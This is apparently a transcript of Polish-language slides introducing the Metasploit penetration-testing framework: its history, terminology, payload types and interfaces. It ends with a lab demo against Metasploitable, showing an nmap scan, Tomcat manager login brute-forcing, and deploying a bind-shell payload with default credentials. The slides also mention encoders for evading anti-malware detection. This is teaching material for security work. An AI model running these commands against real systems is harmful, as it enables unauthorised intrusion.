Metasploit Part 1
Transkrypt
Metasploit Part 1
Metasploit Part 1 The Beginning Agenda • • • • • • Co to jest Metasploit? Historiia Terminologia Rodzaje Payload’ów Opisy modułów Podstawy Konsoli Metasploit... czyli? • Framework do pentestów • Napisany w Ruby • Zawiera w sobie: Exploity, Payloads, Auxiliaries, Automation Tools, i wiele innych... • • • • Wieloplatformowy Wsparcie Developerów Możliwośd pisania własnych wtyczek OpenSource weeeee... :] „A little bit about this shit” Metasploit zostal przygotowany w 2003 roku w jezyku Perl. Od wersji 3.0 zostal calkowicie przepisany w jezyku Ruby. Srodowisko moze byc uruchamiane na wielu wersjach systemu Unix i Linux oraz w systemie Windows. W pazdzierniku 2009 projekt Metasploit zostal przejety przez firme Rapid 7 specjalizujaca sie w oprogramowaniu do zarzadzania podatnosciami systemów. (WiKi) Terminologia Exploit (eksploatowad kogoś lub coś) The vector for getting into the system, whether it be because of a vulnerability or a bad config Payload (Ładunek) What you want the exploit to do. Encoders (Programy szyfrujące) Ways to mangle the code so anti-malware apps won’t detect the payload Auxillary (pomocniczy) Just another fun little app that comes with Metasploit (IRONGEEK) Rodzaje PayLoad’ów - Inline All the shellcode to be executed goes with the payload. More stable, but may be too big. - Staged (pl. Stopniowanie) The payload is just a small stub that grabs the rest of the shell code after the exploit works. Smaller, and less for AV to grab a hold of. -Reverse Instead of having to establish a connection in after an exploit works, the payload connects back you. This has a better chance of getting around firewalls with weak egress filtering. - NoNX These payloads try to work around things like DEP (Data Execution Prevention) (IRONGEEK) Ale Metasploit to nie... Czasem schemat używania to: 1. Ustawid rodzaj exploit’a 2. Ustawid rodzaj payload’a 3. Ustawid cel naszej zabawy 4. Iśd po piwo... 5. Cieszyd się kontrolą ;] To nie wszystko co potrafi Metasploit... On potrafi wiele więcej... Piękny Prosty Interfejs MsfConsole: Piękny Prosty Interfejs MsfCli: Piękny Prosty Interfejs MsfGui: Piękny Prosty Interfejs Piękny Prosty Interfejs MsfWEB: A teraz zalety i wady MsfConsole: + Najlepiej wspierany interfejs frameworka + Prawie wszystkie opcje są dostępne - Nie jako "wskaż i kliknij w msggui / msfweb Msfcli + Łatwo dodad dobrodziejstwa metasploita do własnego skryptu - Nie jest tak dobrze wspierany jak msfconsole - Cięższy do użycia A teraz zalety i wady Msfweb +Fajny Interfejs +Łatwy do zrozumienia treści +Dobry do pokazania prostych ataków -Nie jest tak dobrze wspierany jak msfconsole -Wolny Msfgui + Fajny Interfejs + Własne skórki (IRONGEEK) Podstawy Konsoli Polecenia: help search set setg show (options/advanced/etc) exploit/run sessions –l sessions -i 1 Demo Sytuacja 1: Serwer Ubuntu Hacker Używane rzeczy • BackTrack w wersji 5 • Metasploit 3.7.0 • Nmap • Metasploitable Atak cz. 1 • Skan sieci w poszukiwaniu hosta: $~> nmap –v –sn 192.168.10.0/24 • Skan hosta nmapem • Atak 1 Atak cz. 1 msf > use scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable msf auxiliary(tomcat_mgr_login) > set RPORT 8180 msf auxiliary(tomcat_mgr_login) > exploit Atak cz. 1 Rezultat: mamy login i hasło Cel: zdobyd shell ;] Atak cz. 2 msf > use multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp msf exploit(tomcat_mgr_deploy) > exploit Atak cz. 2 Posiadamy shella, więc możemy dalej psocid. Metasploit Part 1 Q&A The Beginning Linki (WiKi) http://wikipedia.pl (IRONGEEK) http://irongek.com http://www.offensive-security.com/metasploit-unleashed/ http://www.metasploit.com/ http://backtrack-linux.org Metasploit Part 1 THX ;] The Beginning